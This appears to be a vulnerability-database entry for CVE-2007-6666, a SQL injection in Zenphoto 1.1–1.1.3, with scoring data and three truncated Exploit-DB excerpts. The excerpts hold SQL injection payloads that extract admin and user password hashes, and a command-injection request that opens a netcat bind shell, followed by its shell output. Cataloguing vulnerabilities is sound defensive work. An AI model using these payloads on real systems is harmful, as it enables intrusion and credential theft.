CVE-2007-6666
Published 2008-01-04
CVE-2007-6666: SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter.
Priority P3 · 42 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.04% (78.7th percentile)
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zenphoto | zenphoto | — | — |
| zenphoto | zenphoto | — | — |
| zenphoto | zenphoto | — | — |
| zenphoto | zenphoto | — | — |
No detection rules found.
Exploit-DB
ZenPhoto 1.1.3 - 'rss.php?albumnr' SQL Injection
exploitdb·2007-12-31
CVE-2007-6666 ZenPhoto 1.1.3 - 'rss.php?albumnr' SQL Injection
---
#!/usr/bin/perl -w
#################################################################################
# #
# Zenphoto 1.1.3 SQL Injection Exploit #
# #
# Discovered by: Silentz #
# Payload: Admin Username & Hash Retrieval #
# Website: http://www.w4ck1ng.com #
# #
# Vulnerable Code (rss.php): #
# #
# $albumnr = $_GET[albumnr]; #
# #
# if ($albumnr != "") #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE albumid = $albumnr #
# AND `show` = 1 ORDER BY id DESC LIMIT ".$items;} #
# else #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE `show` = 1 ORDER #
# BY id DESC LIMIT ".$items; } #
# #
# PoC: http://victim.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT #
# value FROM zp_options WHERE id=12),(SELECT value FROM zp
Exploit-DB
ewire Payment Client 1.60/1.70 - Command Execution
exploitdb·2007-09-17
CVE-2007-4925 ewire Payment Client 1.60/1.70 - Command Execution
---
source: https://www.securityfocus.com/bid/25683/info
ewire Payment Client is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary shell commands on an affected computer with the privileges of the application using the affected class utility.
ewire Payment Client 1.60 and 1.70 are vulnerable to this issue.
GET
http://www.example.com/simplePHPLinux/3payment_receive.php?paymentin
fo=`/bin/nc -l -p6666 -e /bin/bash`
$ telnet www.example.com 6666
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Exploit-DB
XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
exploitdb·2007-04-02
CVE-2007-1974 XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
---
#!/usr/bin/perl
#[Script Name: XOOPS Module WF-Section : ";
$dir = ;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = ;
chop ($id);
$target = "9999999%20union%20select%201111,2222,3333,4444,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$sock
No writeups or analysis indexed.
http://osvdb.org/39786
http://secunia.com/advisories/28281
http://www.securityfocus.com/bid/27084
https://exchange.xforce.ibmcloud.com/vulnerabilities/39341
https://www.exploit-db.com/exploits/4823
Published: 2008-01-04